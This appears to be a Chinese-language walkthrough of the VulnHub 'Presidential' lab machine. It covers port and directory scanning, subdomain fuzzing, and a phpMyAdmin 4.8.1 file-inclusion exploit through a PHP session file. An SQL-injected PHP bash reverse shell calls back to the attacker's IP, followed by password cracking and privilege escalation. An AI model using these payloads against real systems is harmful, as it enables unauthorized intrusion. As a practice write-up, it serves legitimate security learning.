靶机地址:https://download.vulnhub.com/presidential/Presidential.ova
主机发现
arp-scan -l

端口扫描
nmap --min-rate 10000 192.168.21.150

端口服务扫描
nmap -sV -sT -O -p80 192.168.21.150

漏洞扫描
nmap --script=vuln -p80 192.168.21.150

只有一个端口

目录扫描
gobuster dir -u http://192.168.21.150 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

这个没用
换个工具扫一下
dirsearch -u "http://192.168.21.150/" -e *

这里面先去看config

好东西哦
这里只能扫到80端口
接下来就只能去找一下域名了

修改域名,再扫一遍
gobuster dir -u http://192.168.21.150/ -w SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt

扫不出来,只剩下子域名爆破
wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.votenow.local" --hw 854 --hc 400 votenow.local

改host访问

登入就行

好东西

这里先放着大概率不行的
版本

先去看看有没有洞

这个版本是4.8.1

啊这这个是winddows的
下一个应该就是linux的了

过程很清楚

这里需要包含cookie
jn284slhmdsjnbel58uruk855v80nbi1

包含session
http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_jn284slhmdsjnbel58uruk855v80nbi1(讲sess后面替换)

成功了,反弹shell(要登出一下,因为session会冲突只触发第一次的php命令)
select '<?php system("bash -i >& /dev/tcp/192.168.21.131/666 0>&1");exit;?>'

Session

挂监听


反弹成功
信息收集


getcap -r / 2>/dev/null

找查看开启capabilities的工具(capabilities资料:Linux Capabilities 简介 - sparkdev - 博客园 (cnblogs.com))
有两个ping和tars个软件,去https://gtfobins.github.io/查一下


坏了没有提权的机会,去看一下权限的组了

???
小脑萎缩了
发现了一件事,进错用户了
去admin(root大概率进不去),想起来了admin这里要密码密码在数据库里面出现过
啊啊啊啊

暴力破解,建议用vim写进去,直接重定向会寄

Emmm各种花式大爆炸
去网上查了一下发现要影子文件还要passwd文件
我们拿到的其实是影子文件加密后的密码3
发现我有台机子就是不行
换了一台就好了(这就是传说中的水土不服?)


Passwd在前影子在后写进心得文件

登入admin

信息收集(应该大差不差)


还是一样的吧root用户的密码爆破出来


发现不行,看看使用ssh


Emm真有ssh之前没扫出来


确实有,还是要多扫即便

改权限(反弹shell我连不上就吧文件复制下来用攻击机连的)

 ok
 ok